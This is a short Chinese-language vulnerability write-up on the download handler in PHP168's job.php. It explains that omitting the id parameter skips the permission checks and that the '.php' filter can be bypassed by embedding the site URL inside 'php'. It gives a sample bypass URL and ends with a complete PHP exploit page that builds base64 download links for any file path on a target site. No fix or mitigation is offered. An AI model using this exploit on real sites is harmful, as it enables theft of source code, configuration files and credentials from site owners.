看job.php 92行
elseif($job=="download")
{
$rsdb=$db->get_one("SELECT * FROM {$pre}article WHERE aid='$id'");
$fidDB=$db->get_one("SELECT * FROM {$pre}sort WHERE fid='$rsdb[fid]'");
if($fidDB[admin]&&$lfjid){
$detail=explode(",",$fidDB[admin]);
if( in_array($lfjid,$detail) ){
$web_admin=1;
}
}
if($fidDB[allowdownload]&&!$web_admin&&$lfjuid!==$rsdb[uid]){
$detail=explode(",",$fidDB[allowdownload]);
if( !in_array($groupdb['gid'],$detail) ){
showerr("你所在的用户组无权限下载");
}
}
if($rsdb[allowdown]&&!$web_admin&&$lfjuid!==$rsdb[uid]){
$detail=explode(",",$rsdb[allowdown]);
if( !in_array($groupdb['gid'],$detail) ){
showerr("你所在的用户组无权限下载");
}
}
$url=base64_decode($url);
if( eregi(".php",$url) ){
die("ERR");
}
$fileurl=str_replace($webdb[www_url],"",$url);
if(is_file(PHP168_PATH."$fileurl")&&filesize(PHP168_PATH."$fileurl")<1024*1024*500){
$filename=basename($fileurl);
$filetype=substr(strrchr($filename,'.'),1);
$_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename);
if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){
$filename=urldecode(base64_decode($_filename)).".$filetype";
}
ob_end_clean();
header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT');
header('Pragma: no-cache');
header('Content-Encoding: none');
header('Content-Disposition: attachment; filename='.$filename);
header('Content-type: '.$filetype);
header('Content-Length: '.filesize(PHP168_PATH."$fileurl"));
readfile(PHP168_PATH."$fileurl");
}else{
$fileurl=strstr($url,"://")?$url:tempdir($fileurl);
header("location:$fileurl");
}
exit;
}
一开始是权限判断,可以发现若不传值id,那么两个判断都是为空的,从而可以越权访问。
然后看到116行
$url=base64_decode($url);
if( eregi(“.php”,$url) ){
die(“ERR”);
}
$fileurl=str_replace($webdb[www_url],“”,$url);
若匹配到了php会报错
但下面紧跟着一句代码,会将当前网站的网址替换成空
这样我们就能在php中间加上当前网站的网址,从而绕过过滤,达到下载任意文件的目的
比如 http://test/index.phttp://test.cnhp就可以绕过了
<html>
<body>
<form method="get">
URL: <input type="text" name="url"><br>
DIR: <input type="text" name="dir"><br>
<input type="submit" value="Submit"><br>
<?php
$url = $_GET[url];
$dir = (strlen($_GET[dir])>0)?$_GET[dir]:"/index.php";
if($url[strlen($url)-1]=='/')
$url = substr($url,0,strlen($url)-1);//如果URL的最后一位是/ 则去掉
if ($dir[0]!='/')
$dir = '/'.$dir;//如果第一位不是/则加上
echo "AIM : ".$url."<br />";
echo "DIR : ".$dir."<br /><br />";
$t = 0;
$B64 = $url.$dir;
while ($r = strpos($B64,"php",$t)){
$B64 = substr($B64,0,$r+1).$url.substr($B64,$r+1);
$t = $r + 1;
}
$B64 = base64_encode($B64);
$U = $url."/job.php?job=download&url=".$B64;
echo "<a href>Attack</a>"
?>
</body>
</html>